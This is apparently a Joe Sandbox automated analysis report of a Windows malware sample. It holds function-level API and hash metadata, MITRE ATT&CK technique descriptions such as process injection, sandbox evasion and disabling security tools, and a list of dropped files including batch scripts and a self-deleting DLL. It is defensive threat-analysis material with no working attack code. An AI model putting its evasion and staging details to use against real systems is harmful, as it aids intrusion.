Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 69c8c07bcb791fb785738829cd10c29190a6685c9026359a959baa5e0d41d55b
Instruction ID: 04dff40eaa5975d4421a2039d3eb5be5080597dcfa90b8d0ab21d67e5ec7c10f
Opcode Fuzzy Hash: 69c8c07bcb791fb785738829cd10c29190a6685c9026359a959baa5e0d41d55b
Instruction Fuzzy Hash: BFF05430406621AFC6616F50FD08A9B7B69FB45B12B45843BF145F11E8C73C48818B9D

Function 0040554D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040557C
CallWindowProcW.USER32(?,?,?,?), ref: 004055CD

Part of subcall function 0040451F: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404531

Strings

, xrefs: 0040555D

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 1c6db2fb8bf2a941a381235c92e780c462a7a47fd759007b21bb5a8fe18e5fa5
Instruction ID: 8cb385540c394feb6b7acedb458c1b163c7bd0e2eecbca803c6ec6ccc0281e24
Opcode Fuzzy Hash: 1c6db2fb8bf2a941a381235c92e780c462a7a47fd759007b21bb5a8fe18e5fa5
Instruction Fuzzy Hash: 68017C71101609FBEF205F11DD84A9B3A2BEBC4754F20403BFA05761D5D73A8D929E6D

Function 00406422 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(?,00000000,00000000,007A0728,?,00000800,00000000,?,007A0728,?,?,Del,?,00000000,00406693,80000002), ref: 00406468
RegCloseKey.ADVAPI32(?), ref: 00406473

Strings

Del, xrefs: 00406429

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: CloseQueryValue
String ID: Del
API String ID: 3356406503-3562819231
Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction ID: 8bbbfa9f798598a3d1dedb2a9c281e33174829b5b93865dedadbfc74a219c892
Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction Fuzzy Hash: 9F01B132110209BADF21CF51CD05EDB3BA8EB44360F018039FD1692150D738DA64DBA4

Function 00403B91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,74DF3420,00000000,C:\Users\user\AppData\Local\Temp\,00403B69,00403A7F,?,?,00000008,0000000A,0000000C), ref: 00403BAB
GlobalFree.KERNEL32(00000000), ref: 00403BB2

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403B91

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3081826266
Opcode ID: 00efa9c9f1272b7cc7d931f24958e2d47b6ee42ce3838b547fcba19599468942
Instruction ID: b7081a2a86391088548fef66407111aafa244a1a89fd4905b066b82f00895e7d
Opcode Fuzzy Hash: 00efa9c9f1272b7cc7d931f24958e2d47b6ee42ce3838b547fcba19599468942
Instruction Fuzzy Hash: 59E0C23340053057CB211F45ED04B1AB778AF95B26F09807BE940BB2618BBC2C438FC8

Function 00405E6F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\KYagm8gq5S.exe,C:\Users\user\Desktop\KYagm8gq5S.exe,80000000,00000003), ref: 00405E75
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\KYagm8gq5S.exe,C:\Users\user\Desktop\KYagm8gq5S.exe,80000000,00000003), ref: 00405E85

Strings

C:\Users\user\Desktop, xrefs: 00405E6F

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-224404859
Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
Instruction ID: e625fb8110be14d05545ed3956eb9dcd351d24123ebbdb87cfc6543e98ba95a5
Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
Instruction Fuzzy Hash: 27D05EB3400920AAC312A704DD00DAF73A8EF523447464466F881A71A5D7785D8186EC

Function 00405FA9 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB9
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FD1
CharNextA.USER32(00000000,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FE2
lstrlenA.KERNEL32(00000000,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEB

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
Instruction ID: 0ddac3552a90187c63c7b8d1f8650bd486a880c4da7af56fddea67c471c8745b
Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
Instruction Fuzzy Hash: 5AF09631104515FFCB029FA5DE04D9FBBA8EF05350B2540B9F880F7250D678DE01ABA9

Analysis Process: nggwslounqxvwf.exePID: 7424, Parent PID: 7264COMMON

Executed Functions

Function 018707F8 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1725029777.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1870000_nggwslounqxvwf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f59c9f5d2ee7bd853c853f1936c0dd414b3dc0a60a74b86e3c454dabb561d2b7
Instruction ID: 8ff3aac1a49ddc40873dc1e372ad3d67a9380cacfd99327f4efdd397fa8104b3
Opcode Fuzzy Hash: f59c9f5d2ee7bd853c853f1936c0dd414b3dc0a60a74b86e3c454dabb561d2b7
Instruction Fuzzy Hash: 2F31F631E053508FCB069B38C4252DE7FB1AF8A315F1584AFD041DB7A2CA359C4ACB92

Function 01871206 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1725029777.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1870000_nggwslounqxvwf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 566d2f42b16f6ea1ffc38e61acf43ea29136285e24858422667f3d7496112565
Instruction ID: 51759ceaca6eb164e6da5abf38cd55f7f1035ba21d2ac27837d833989fc88748
Opcode Fuzzy Hash: 566d2f42b16f6ea1ffc38e61acf43ea29136285e24858422667f3d7496112565
Instruction Fuzzy Hash: 2E3138B0D002489FDB14CFAAD584ADEFFF1AF48310F24806AE959AB350DB349A45CF91

Function 01871210 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1725029777.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1870000_nggwslounqxvwf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fa46d8a8577eaa39b0de4df5b87101b4cd7ddf08f54d0447326ca3a11e50257
Instruction ID: 5e9c80af372e127bcdfc5f936af3ca00eda4376685fb7386988b234f097658db
Opcode Fuzzy Hash: 0fa46d8a8577eaa39b0de4df5b87101b4cd7ddf08f54d0447326ca3a11e50257
Instruction Fuzzy Hash: FE3116B0D002489FDB14DFAAC584ADEFFF5AF48310F248029E959AB350DB349A45CFA1

Function 01870848 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1725029777.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1870000_nggwslounqxvwf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f577da2ecf7350d86085cba98ad97acdee8dd8e34caf173560f5a23b96d4e9fa
Instruction ID: 469dd1feb32cf75e2837665ec3c0b4dbc6fbb513d51ec75fb5b9dcb579e7e1d8
Opcode Fuzzy Hash: f577da2ecf7350d86085cba98ad97acdee8dd8e34caf173560f5a23b96d4e9fa
Instruction Fuzzy Hash: 36219231B04214CFCB199B78C0597AE7BB2AB8A305F14887DE012EB791CE76DC46CB91

Function 0159D76D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1724637305.000000000159D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0159D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_159d000_nggwslounqxvwf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31278eb35fb7ad2b16bf28ae79d7692ca6d533d0d24bc6444cded9bde5008baf
Instruction ID: 5f1bc3211dde9206521718780f9b6a8f36cf11d7141f3c9aca3fc0c09dca6654
Opcode Fuzzy Hash: 31278eb35fb7ad2b16bf28ae79d7692ca6d533d0d24bc6444cded9bde5008baf
Instruction Fuzzy Hash: CE01A7720083849AEB108B99DCC4B6EFFE8FF51325F18C85AED190E282C6789840C772

Function 0159D76C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1724637305.000000000159D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0159D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_159d000_nggwslounqxvwf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0b07da8e3153d9725098cc636d51bfac1f8e61dfddb4605a79687cf38b0f128
Instruction ID: f78c73e5db387e750fd6e463f8ebe2954eb6ea505efea7c5adaff363231839d4
Opcode Fuzzy Hash: b0b07da8e3153d9725098cc636d51bfac1f8e61dfddb4605a79687cf38b0f128
Instruction Fuzzy Hash: 49F06272404384AEEB118B1ADC84B6AFFE8EB51634F18C45AFD484E286C2799844CB71

Function 01870915 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1725029777.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1870000_nggwslounqxvwf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab194762c9a507c240523311768604ac5c5d379f5f494a4cdd6981ac83de70bb
Instruction ID: 3ed103f8f5b4ccc9e4fad89166464d4dca1a9f75e26b2d4f469040a2433b1bfc
Opcode Fuzzy Hash: ab194762c9a507c240523311768604ac5c5d379f5f494a4cdd6981ac83de70bb
Instruction Fuzzy Hash: 9BE01270A0020ACFEB15DB69D4A8B6D77B0AB49304F104458F112DB2A1DB74C944DF51

Function 0187094A Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1725029777.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1870000_nggwslounqxvwf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7ec79df64730d008f5caf85f51730156ce788572ed4841d682b3f9d140eef8b
Instruction ID: 6d35c3359720f9afe2784a76be75f432b14c8b69c37d753b6bbc1d30c4ff54c5
Opcode Fuzzy Hash: d7ec79df64730d008f5caf85f51730156ce788572ed4841d682b3f9d140eef8b
Instruction Fuzzy Hash: 09E01270A4020ACFEB15DB68C4A8B6E77B0EB45304F104458F011EB2A1DB74C904CF51

Function 0187097F Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1725029777.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1870000_nggwslounqxvwf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d60f3f4173d106eb5c4a72adfd8ae9a362b3bdedebdbe88f8caad6b50e97f4df
Instruction ID: 4722e1efcf123b2a829ebd643b03fb5c94d1e8106f12c0b3748d5b125cf0ef2b
Opcode Fuzzy Hash: d60f3f4173d106eb5c4a72adfd8ae9a362b3bdedebdbe88f8caad6b50e97f4df
Instruction Fuzzy Hash: 2AE01270A0020ACFEB15DF69C469B6D77B1BB85304F104858F011DB2A1DB74CD44CF51

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report KYagm8gq5S.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\nggwslounqxvwf.exe.log

C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\0.bat

C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\1-1.bat

C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\1-2.bat

C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\1-3.bat

C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\1519

C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\2.bat

C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\3-1.bat

C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\3-2.bat

C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\3-3.bat

C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\3-4.bat

C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\3-5.bat

C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\4.bat

C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\BasicCalculator1.exe

C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\PowerRun64.exe

C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\SelfDel.dll

